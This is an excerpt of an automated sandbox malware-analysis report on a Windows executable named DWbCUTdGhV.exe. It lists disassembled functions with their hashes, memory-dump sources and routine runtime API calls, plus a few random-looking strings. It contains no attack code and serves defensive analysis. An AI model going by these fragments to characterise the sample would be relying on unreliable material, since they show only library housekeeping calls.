                • Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 44629269dbd2d18a87173cda0e86e4c7f6dc554b68677a5636144c2dd3ace751
                • Instruction ID: 2fabe44138c384566167d15d067328a907fd4c50051033b01e74833ce7af4fe4
                • Opcode Fuzzy Hash: 44629269dbd2d18a87173cda0e86e4c7f6dc554b68677a5636144c2dd3ace751
                • Instruction Fuzzy Hash: 76F01272619600A7AE78EB6CF4C5C1AB3EAAA417107588809F508E7651CB3CFCC18A75
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                • Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd
                Similarity
                • API ID:
                • String ID: C:\Users\user\Desktop\DWbCUTdGhV.exe
                • API String ID: 0-778015232
                • Opcode ID: 0158d1e0dfa25a7687c9dfe32d98ec0e49f0e2d33a3830050bac5c01d0219047
                • Instruction ID: e2c7833a3075814724db9bf8d60addd84ef2f61408062fd4aad32d9f94616636
                • Opcode Fuzzy Hash: 0158d1e0dfa25a7687c9dfe32d98ec0e49f0e2d33a3830050bac5c01d0219047
                • Instruction Fuzzy Hash: 07319E75A00219EBCF21DF99EC89D9EBBB9EB86710B10416AF504E7250E7789E40CB50
                APIs
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00796163,00000000,?,007A8D08,?,?,?,00796306,00000004,InitializeCriticalSectionEx,007A1C98,InitializeCriticalSectionEx), ref: 007961BF
                • GetLastError.KERNEL32(?,00796163,00000000,?,007A8D08,?,?,?,00796306,00000004,InitializeCriticalSectionEx,007A1C98,InitializeCriticalSectionEx,00000000,?,007960BD), ref: 007961C9
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 007961F1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                • Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd
                Similarity
                • API ID: LibraryLoad$ErrorLast
                • String ID: api-ms-
                • API String ID: 3177248105-2084034818
                • Opcode ID: 1192868d021524fd346d052682ff358eee33d1c0694ebf07c82541f41ad075d3
                • Instruction ID: 81ccbce6391ee738503041364539d07a0968cc67fcd2901a357d9b896d262f93
                • Opcode Fuzzy Hash: 1192868d021524fd346d052682ff358eee33d1c0694ebf07c82541f41ad075d3
                • Instruction Fuzzy Hash: 1FE04F302C4209B7FF202B60FD07B5A3E59DB41B90F508530FA0DE80E2EB6DD9919599
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                • Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd
                Similarity
                • API ID: AdjustPointer
                • String ID:
                • API String ID: 1740715915-0
                • Opcode ID: ecdf72b0be281b1db8f2cf626c8a9dae85f759fe038910fa3cb3a216cdca0410
                • Instruction ID: d746644d9ab9f194237e549faa8f4c9928bd2f415b05a05e21a5b6cb5b960e65
                • Opcode Fuzzy Hash: ecdf72b0be281b1db8f2cf626c8a9dae85f759fe038910fa3cb3a216cdca0410
                • Instruction Fuzzy Hash: DD51D0B2601A26EFDF2A8F54F845BAAB7A4FF45310F24412DED0157291E739EC41CB90
                APIs
                • GetLastError.KERNEL32(?,?,?,0079C440,?,00000001,0079AD76,?,0079C8FA,00000001,?,?,?,0079AD05,?,?), ref: 0079832F
                • _free.LIBCMT ref: 0079838C
                • _free.LIBCMT ref: 007983C2
                • SetLastError.KERNEL32(00000000,00000005,000000FF,?,0079C8FA,00000001,?,?,?,0079AD05,?,?,?,007A7520,0000002C,0079AD76), ref: 007983CD
                Memory Dump Source
                • Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                • Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd
                Similarity
                • API ID: ErrorLast_free
                • String ID:
                • API String ID: 2283115069-0
                • Opcode ID: 76576bfc3cfa42a753f6ee7812d76e13f89949eb758ab60f9e21df26872a0934
                • Instruction ID: 1f08aea7b7147ef0c1eca1bfc36958d91b4147bd6f76d5d1d111669aed8e1c57
                • Opcode Fuzzy Hash: 76576bfc3cfa42a753f6ee7812d76e13f89949eb758ab60f9e21df26872a0934
                • Instruction Fuzzy Hash: 2111E572614201BBDF952778BC89E2F376A9BC3B74B284B25F624921D2DD2D8C098177
                APIs
                • GetLastError.KERNEL32(?,007911AD,?,00798822,007985BF,?,?,007911AD,?), ref: 00798486
                • _free.LIBCMT ref: 007984E3
                • _free.LIBCMT ref: 00798519
                • SetLastError.KERNEL32(00000000,00000005,000000FF,?,007911AD,?,00798822,007985BF,?,?,007911AD,?), ref: 00798524
                Memory Dump Source
                • Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                • Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd
                Similarity
                • API ID: ErrorLast_free
                • String ID:
                • API String ID: 2283115069-0
                • Opcode ID: 5b5deec7df3d9c7e1d2942dd7bdfde84e7e2a02c8394c92559d3514209c827bd
                • Instruction ID: 2480a25fefc06ab95f4b5a18709103a555ad466f4cba467dc41b70186a9b753f
                • Opcode Fuzzy Hash: 5b5deec7df3d9c7e1d2942dd7bdfde84e7e2a02c8394c92559d3514209c827bd
                • Instruction Fuzzy Hash: 68110872604141BEDF916B78BC89E2F27699FC33747258729F524D61E2DE2C8C098173
                APIs
                • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,0079CF35,?,00000001,?,00000001,?,0079C3CF,?,?,00000001), ref: 0079D4ED
                • GetLastError.KERNEL32(?,0079CF35,?,00000001,?,00000001,?,0079C3CF,?,?,00000001,?,00000001,?,0079C91B,0079AD05), ref: 0079D4F9
                  • Part of subcall function 0079D4BF: CloseHandle.KERNEL32(FFFFFFFE,0079D509,?,0079CF35,?,00000001,?,00000001,?,0079C3CF,?,?,00000001,?,00000001), ref: 0079D4CF
                • ___initconout.LIBCMT ref: 0079D509
                  • Part of subcall function 0079D481: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0079D4B0,0079CF22,00000001,?,0079C3CF,?,?,00000001,?), ref: 0079D494
                • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,0079CF35,?,00000001,?,00000001,?,0079C3CF,?,?,00000001,?), ref: 0079D51E
                Memory Dump Source
                • Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                • Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd
                Similarity
                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                • String ID:
                • API String ID: 2744216297-0
                • Opcode ID: 068529891c0f5f81565eaa0246efa5df837382f9edc60765991220433ba614bc
                • Instruction ID: 374021bbe808fbcabfb606b405a2b15cd47f1b0f147f43effe1e9bb3fe3ced23
                • Opcode Fuzzy Hash: 068529891c0f5f81565eaa0246efa5df837382f9edc60765991220433ba614bc
                • Instruction Fuzzy Hash: D3F0C036911168BBCF722FD5EC08A9A3F66FB493E1F458010FE1895130DA3ADC60DB95
                APIs
                • _free.LIBCMT ref: 00797C74
                  • Part of subcall function 00797FB2: HeapFree.KERNEL32(00000000,00000000,?,00799DC0,?,00000000,?,?,?,00799DE7,?,00000007,?,?,0079A25B,?), ref: 00797FC8
                  • Part of subcall function 00797FB2: GetLastError.KERNEL32(?,?,00799DC0,?,00000000,?,?,?,00799DE7,?,00000007,?,?,0079A25B,?,?), ref: 00797FDA
                • _free.LIBCMT ref: 00797C87
                • _free.LIBCMT ref: 00797C98
                • _free.LIBCMT ref: 00797CA9
                Memory Dump Source
                • Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                • Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: fdc85b9a568766b8fb38026f05f4bcbe58e343ab019dd243702cf76823ff8e7f
                • Instruction ID: 30223f3fb5d90fd7f98d6c922797abcbda74222741f6d18c06c6bd2ac5da4304
                • Opcode Fuzzy Hash: fdc85b9a568766b8fb38026f05f4bcbe58e343ab019dd243702cf76823ff8e7f
                • Instruction Fuzzy Hash: 2CE0BF715281A9EA8F166F28FC4D4867B26E7CA710742C046FA4526331C63D45B3DFA9
                APIs
                • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 007957A5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                • Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd
                Similarity
                • API ID: EncodePointer
                • String ID: MOC$RCC
                • API String ID: 2118026453-2084237596
                • Opcode ID: 936637a109ce541cdb19bcd0e7c429392b9abdc5d4a61c2c291a8e01d3c000c7
                • Instruction ID: ba11ceab3c7ceae02303d784efcacb13b65606f0bf121493da812d9066076188
                • Opcode Fuzzy Hash: 936637a109ce541cdb19bcd0e7c429392b9abdc5d4a61c2c291a8e01d3c000c7
                • Instruction Fuzzy Hash: 55417971900619EFCF16DFA8E885EAEBBB5BF48304F188059F905A7221D339A951CB50
                APIs
                • GetModuleHandleA.KERNEL32(kernel32), ref: 0079111B
                • GetModuleHandleW.KERNEL32(00000000), ref: 00791162
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                • Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd
                Similarity
                • API ID: HandleModule
                • String ID: kernel32
                • API String ID: 4139908857-541877477
                • Opcode ID: da70534b0f6b5cf8ce231f57337e5375e72ea6eb1fa1e0ad0098f6dd776c11b7
                • Instruction ID: e0ca0ff76db1c29c90c2ba62791303c64b88f9dd7b9d0b7ea99c9115e7bb9b26
                • Opcode Fuzzy Hash: da70534b0f6b5cf8ce231f57337e5375e72ea6eb1fa1e0ad0098f6dd776c11b7
                • Instruction Fuzzy Hash: 5321F5B9E4020DEBCF04DFE4D849AEEBBB4AF48304F508558E905A7244E7399A50CFA1
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                • Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd
                Similarity
                • API ID: Max_valueMin_value
                • String ID: [4y
                • API String ID: 3846992165-224076332
                • Opcode ID: b23dc5a212cdaf110c71246c1bb5c47703ea5d9cf8a58707570367144485a173
                • Instruction ID: 1e2d544bc165fd9e903036f3cbf243c3495992c7c6ad520f1a5b74aa3ee70365
                • Opcode Fuzzy Hash: b23dc5a212cdaf110c71246c1bb5c47703ea5d9cf8a58707570367144485a173
                • Instruction Fuzzy Hash: 5D01ECB5D1020DDFCF04EFA4E8469EEBBB4AF48300F508569E516A7311EA38A704DB91
                APIs
                  • Part of subcall function 00793040: char_traits.LIBCPMTD ref: 00793080
                • task.LIBCPMTD ref: 00792AB3
                • task.LIBCPMTD ref: 00792AC2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                • Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd
                Similarity
                • API ID: task$char_traits
                • String ID: dboupzalsfzwvwpyqdpu
                • API String ID: 1455298312-2047172133
                • Opcode ID: 54487e678644643331035d5d182fb9f58aba05d4128db7f695330a94bb7acfdb
                • Instruction ID: 28944ec50ee79c674b473853a114734edd3927cb2e504cb125e97439403d68d4
                • Opcode Fuzzy Hash: 54487e678644643331035d5d182fb9f58aba05d4128db7f695330a94bb7acfdb
                • Instruction Fuzzy Hash: 5E018CB1904648EBCB00DF58D845BAEBBB4FB05720F008769F821A73C0DB796B14CB80
                APIs
                  • Part of subcall function 00793040: char_traits.LIBCPMTD ref: 00793080
                • task.LIBCPMTD ref: 00792A43
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                • Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd
                Similarity
                • API ID: char_traitstask
                • String ID: S$oeislvoodubcwjonjrwnhbjfxmsna
                • API String ID: 3039116899-104439280
                • Opcode ID: eeb49413d5b80acb7f6109638a6da4bf2ee65f0d03a75c43ee0fcee26ad92829
                • Instruction ID: 3ec7a14702aec7d9ed72ce2d546e99400af75f34cae0b715be42a2722a42a105
                • Opcode Fuzzy Hash: eeb49413d5b80acb7f6109638a6da4bf2ee65f0d03a75c43ee0fcee26ad92829
                • Instruction Fuzzy Hash: 82F06D71D04208DBDF18EFA8E5597FEB7B0EB08304F108069D80277282EA7D9E09DB59